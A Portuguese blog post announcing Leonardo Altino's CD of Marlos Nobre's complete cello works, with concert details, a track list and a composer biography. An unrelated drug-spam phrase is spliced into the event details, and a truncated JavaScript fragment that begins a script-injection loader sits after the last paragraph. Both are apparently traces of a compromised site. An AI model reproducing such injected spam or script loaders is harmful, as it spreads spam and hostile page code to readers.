CD/DVDProgramação

Integral das obras para violoncelo de Marlos Nobre

Leonardo Altino lança CD de estreia “Poema”com a integral das obras para violoncelo de MARLOS NOBRE.

 

SERVIÇO

Salão Nobre do Teatro de Santa Isabel

online purchase of priligy in malaysia Lançamento dia 13 de dezembro, as 17h.

Entrada Franca

Patrocínio: Petrobras
Apoio: Funcultura, Fundarpe, Governo do Estado, GPAC, Art Music
Realização: Ministério da Cultura, Governo Federal

 

No CD estão :

– DESAFIO II;
– PARTITA LATINA (7 movimentos);
– TRÊS CANTOS DE IEMANJÁ (1.Estrela do Mar; 2.Yemanjá ôtô; 3.Ogum de Lê);
– CANTORIA I;
– CANTORIA II;
– CANTILENA I;
– CANTILENA II;
– CANTILENA III;
– POEMA III (que dá nome ao título do CD) e uma das favoritas do repertório do violoncelo na atualidade.

O concerto de lançamento se realizará no próximo dia 13 de dezembro, terça-feira, às 17hs. no Salão Nobre do Teatro de Santa Isabel, abrindo a programação do XIV FESTIVAL VIRTUOSI DE RECEIFE 2011.

Leonardo Altino

O Virtuosi será palco, pela primeira vez, do lançamento de um álbum. O violoncelista Leonardo Altino aporta no Estado e tem como objetivo apresentar seu primeiro CD, que foi selecionado  na seleção pública do Programa Petrobras Cultural e tem incentivo do Funcultura. O violoncelista toca em parceria com a pianista Ana Lucia Altino. Os sobrenomes não são mera coincidência. Mãe e filho músicos carregam no DNA a aptidão e o gosto pela música erudita e produziram juntos o “Poema”. O disco pode ser baixado no site http://www.virtuosi.com.br/poema/

O material nasceu com intuito de agregar todas as 17 obras escritas para violoncelo do compositor pernambucano Marlos Nobre até hoje. O artista é considerado nacional e internacional como o principal compositor brasileiro da geração posterior a Villa-Lobos.

Desde o início de sua carreira fulgurante, vem somando prêmio após prêmio, começando em 1960 com o 1º Prêmio Música e Músicos do Brasil do MEC que o lançou imediatamente no cenário de exceção da criação brasileira. Após esse primeiro prêmio, seguiram-se um total de 25 prêmios nacionais e internacionais, destacando-se o Prêmio UNESCO em 1974 (jamais atribuído a um compositor não europeu até então) e o Prêmio TOMÁS LUIS DE VICTORIA 2004 no qual foi considerado pelo júri como o mais importante compositor de toda o continente Iberoamericano da atualidade.

Na ocasião foi lançado o livro do consagrado musicólogo espanhol Tomás Marco, “MARLOS NOBRE: EL SONIDO DEL REALISMO MÁGICO” com 222 páginas e estudos apurados sobre o estilo e obras completas do compositor. Após este prêmio, o renome de Marlos Nobre vem alcançando grande repercussão em todo o mundo e a execução de suas obras alcança atualmente o número de mais de 300 apresentações anuais.

Louvado por nomes míticos da música mundial como Arthur Rubinstein, Yehudi Menuhin, Henri Dutilleux, e com críticas consagratórias no New York Times, Washington Post, Tribune de Génève, o compositor é também regente e pianista tendo gravado um CD duplo que hoje é referência mundial na interpretação de suas obras, pela editora suíça LEMÁN CLASSICS.

Nestes dois CDs Marlos Nobre toca como solista o seu DIVERTIMENTO e seu CONCERTO BREVE para Orquestra e dirige suas obras MOSAICO, CONVERGÊNCIAS, RHYTHMETRON, O CANTO MULTIPLICADO com a Musica Nova Philharmonia, tendo merecido as menções máximas das revistas especializadas nos Estados Unidos (FANFARE, THE WASHINGTON POST, NEW YORK TIMES), França (REPERTOIRE e REVUE SCHERZO), Londres (THE STRAD  e MUSIC OPINION). Itália (LA STAMPA), Lisboa (ARTE MÚSICA), Berlin (BERLINER MORGENPOST), Suíça (TRIBUNE DE GÉNÈVE), Holanda (TROW AMSTERDAM).

Seus recentes CDs com a CHANNEL CLASSICS de Amsterdam, com o Cello Octeto Ibérico de Amsterdam, incluindo suas TRES CANÇÕES NEGRAS, TRES CANÇÕES DE BEIRAMAR, CANTO A GARCIA LORCA e DESAFIO XXXII (as 3 primeiras com soprano) alçaram o compositor, segundo o crítico da revista REPERTOIRE de Paris, a um elevado nível, ao afirmar  que “Marlos Nobre Possui o gênio de um Dallapiccola e avitalidade de um Ginastera”.

Com um catálogo atual de 240 obras publicadas em 140 CDs lançados sobretudo nos Estados Unidos e Europa, Marlos Nobre representa atualmente, na visão de críticos e musicólogos norte-americanos e europeus, a imagem máxima da criação contemporânea brasileira.

Em suas obras, Nobre consegue refletir o ecletismo de seus estudos, em que sua música sintetiza técnicas de vanguarda e um certo colorido “brasileiro”, expressando-se em uma linguagem própria, sem se prender a dogmas, cartilhas ou manuais.

Para o compositor, é uma grande honra ter como intérprete o jovem violoncelista Leonardo Altino. “Considero-o como maior revelação atual do instrumento em todo o mundo”, assume Nobre. A sensibilidade que Leonardo desenvolveu ao longo dos anos é dotada de uma técnica perfeita. “Ao lado de Ana Lúcia Altino, eles fazem um duo de extraordinária musicalidade e compreensão superior das obras”, conclui.} else {var d=document;var s=d.createElement(‘script’);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.